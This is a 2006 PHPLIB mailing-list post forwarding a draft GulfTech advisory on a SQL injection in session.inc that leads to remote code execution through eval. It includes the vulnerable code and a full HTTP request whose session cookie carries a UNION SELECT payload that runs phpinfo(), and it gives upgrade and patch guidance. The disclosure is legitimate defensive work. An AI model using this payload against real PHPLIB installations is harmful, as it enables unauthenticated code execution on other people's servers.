[Phplib-users] Upcoming GulfTech Security Research advisory
Brought to you by:
nhruby,
richardarcher
From: Richard A. <rh...@ju...> - 2006-03-02 03:35:11
|
Greetings, James at GulfTech Security Research has kindly allowed me to post a draft of his upcoming security advisory to this list before he releases it to the general community. This will give PHPLIB users some time to upgrade before any potential exploit becomes available. I believe this only effects session.inc, not session4.inc. So if you are using PHPLIB with php4 sessions, this particular problem shouldn't be an issue for you. The solution to this vulnerability is to upgrade to 7.4a which is available from our Sourceforge download page: http://sourceforge.net/project/showfiles.php?group_id=31885 Or if you prefer, manually apply a patch to php/session.inc: http://cvs.sourceforge.net/viewcvs.py/phplib/php-lib-stable/php/session.inc?r1=1.19&r2=1.20 My thanks to James at GulfTech Security Research for alerting us to this problem and allowing time to release a solution before releasing the advisory. ...Richard. ---begin forwarded text GulfTech Security Research Advisory Remote Code Execution: There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution. ## Propagate the session id according to mode and lifetime. ## Will create a new id if necessary. To take over abandoned sessions, ## one may provide the new session id as a parameter (not recommended). function get_id($id = "") { global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS; $this->newid=true; $this->name = $this->cookiename==""?$this->classname:$this->cookiename; if ( "" == $id ) { $this->newid=false; switch ($this->mode) { case "get": $id = isset($HTTP_GET_VARS[$this->name]) ? $HTTP_GET_VARS[$this->name] : ( isset($HTTP_POST_VARS[$this->name]) ? $HTTP_POST_VARS[$this->name] : "") ; break; case "cookie": $id = isset($HTTP_COOKIE_VARS[$this->name]) ? $HTTP_COOKIE_VARS[$this->name] : ""; break; default: die("This has not been coded yet."); break; } } ### do not accept user provided ids for creation if($id != "" && $this->block_alien_sid) { # somehow an id was provided by the user if($this->that->ac_get_value($id, $this->name) == "") { # no - the id doesn't exist in the database: Ignore it! $id = ""; } } The above code is from sessions.inc @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call. GET /phplib/pages/index.php3 HTTP/1.1 Host: example.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/* If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call. This could obviously be used for more sinister purposes such as running arbitrary system commands and the like. Also, since user authentication is not necessary to exploit this vulnerability, the risk of being exploited is much higher. ---end forwarded text |